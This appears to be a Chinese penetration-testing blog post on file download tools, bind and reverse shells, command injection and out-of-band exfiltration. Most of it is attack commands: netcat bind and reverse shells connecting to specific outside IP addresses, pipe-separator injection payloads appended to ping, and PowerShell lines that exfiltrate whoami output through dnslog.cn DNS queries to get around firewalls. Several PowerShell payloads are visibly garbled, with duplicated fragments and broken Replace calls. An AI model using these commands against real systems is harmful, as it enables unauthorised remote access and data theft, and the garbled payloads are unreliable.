反弹SHELL&不回显带外&正反向连接&文件下载

常规基本渗透命令详解

https://blog.csdn.net/weixin_43303273/article/details/83029138

文件下载

实用案例1:文件上传下载-解决无图形化&解决数据传输
命令生成:https://forum.ywhack.com/bountytips.php?download]
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
反弹shell

什么是反弹shell

反弹shell就是在进行渗透测试时,攻击机在监听某个端口时。目标机主动发起请求连接到攻击机,并将其命令行的输入输出转到攻击机。

命令生成:
https://forum.ywhack.com/shell.php
1、正向连接:本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口

nc -e cmd -lvp 5566

//主动连接目标5566

ncat 47.122.23.131 5566

Windows控制Linux //绑定SH到本地5566端口

ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 47.94.236.117 5566

2、反向连接:主动给出去,对方监听
//绑定CMD到目标5566端口

ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接

nc -lvvp 5566

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

//绑定CMD到目标5566端口

nc -e cmd 47.94.236.117 5566

//等待5566连接

ncat -lvvp 5566

#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && (特有``和;)
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 whoami

1、判断windows
2、windows没有自带的nc
3、想办法上传nc 反弹权限
4、反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接
#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog
出站入站都开启策略(数据不回显):OSI网络七层
127.0.0.1 | powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.f4an93.dnslog.cn’; z = z= z=x+$y;ping $z

漏洞有,但是数据不回显:
1、反弹shell
2、带外查询

确定能执行命令
windows

;

ping 127.0.0.1 |

为什么要这样写
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行

powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

127.0.0.1 | powershell x = v e r ; x=ver; x=ver;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(,ˊxxx);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值